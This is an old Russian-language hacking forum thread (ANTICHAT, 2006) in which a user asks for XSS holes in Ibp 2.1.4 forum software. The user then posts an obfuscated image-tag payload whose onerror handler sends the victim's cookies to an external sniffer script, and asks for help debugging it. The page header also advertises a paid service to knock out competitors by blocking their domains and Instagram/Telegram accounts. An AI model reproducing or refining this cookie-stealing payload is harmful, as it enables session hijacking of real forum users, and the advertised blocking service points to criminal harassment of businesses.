УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Уязвимость для Ibp 2.1.4.

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость для Ibp 2.1.4.

20.03.2006, 17:29

Medigan

Новичок

Регистрация: 12.03.2006

Сообщений: 10

Провел на форуме:
24019

Репутация: 0

Уязвимость для Ibp 2.1.4.

Люди плиз подскажите есть ли какие нибудь уязвимости ( Желательно Xss) для форумов Ibp 2.1.4.?
Заранее спасибо.

20.03.2006, 18:16

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

Провел на форуме:
3212607

Репутация: 454

мляяяяя
http://www.google.com/custom?hl=en&i...CURITY.NNOV.ru

КОГДА ЭТО ЗАКОНЧИТСЯ???

20.03.2006, 18:16

Otaku

Познавший АНТИЧАТ

Регистрация: 24.07.2005

Сообщений: 1,057

Провел на форуме:
1864132

Репутация: 116

http://forum.antichat.ru/thread15709.html

20.03.2006, 18:20

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

Провел на форуме:
9751379

Репутация: 3812

Отправить сообщение для +toxa+ с помощью ICQ

Отправить сообщение для +toxa+ с помощью AIM

ТУТ смотри....

__________________

20.03.2006, 18:36

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

Провел на форуме:
2821162

Репутация: 1320

А также тут: http://forum.antichat.ru/thread11807.html

20.03.2006, 20:36

Medigan

Новичок

Регистрация: 12.03.2006

Сообщений: 10

Провел на форуме:
24019

Репутация: 0

Спасибо, надо бы это добавить в топик про полный анализ Ibp, а то я там и искал.
Но возникла проблема.
После вставки этого кода

Код HTML:

[img]/[snapback]	onerror=document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg/.source.replace(/x/g,String.fromCharCode(47))+String.fromCharCode(63)+document.cookies	tyle=visibility:hidden=	[/snapback].gif[/img]

Приходят куки на сниффер, но в поле QUERY пишет undefined

Код HTML:

QUERY=undefined

И еще можно тупой вопрос?
У нас есть

Код HTML:

http:xxantichat.ruxcgi-binxs.jpg/

Тут заменен слэш на X, я смотрел различные кодировки для него, но нигде не видел код в виде буквы X. Где можно поподробней про это прочитать?

Последний раз редактировалось Medigan; 20.03.2006 в 20:47..

20.03.2006, 20:55

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

Провел на форуме:
2821162

Репутация: 1320

Вот здесь можно прочитать подробнее:

Цитата:

.source.replace(/x/g,String.fromCharCode(47))

20.03.2006, 21:02

Medigan

Новичок

Регистрация: 12.03.2006

Сообщений: 10

Провел на форуме:
24019

Репутация: 0

Понял, сенксь...

21.03.2006, 00:56

1SeTh

Участник форума

Регистрация: 17.02.2006

Сообщений: 189

Провел на форуме:
2406659

Репутация: 34

а для форума Ibp 2.1.5. кто нить знает уязвимость?

#10

22.03.2006, 15:15

Medigan

Новичок

Регистрация: 12.03.2006

Сообщений: 10

Провел на форуме:
24019

Репутация: 0

Так никто не знает почему куки неизвестны? Это случайно не хорошо настроенный Internet Explorer?

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ?	UnKn0wN	Уязвимости Mail-сервис	32	08.04.2006 04:20

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход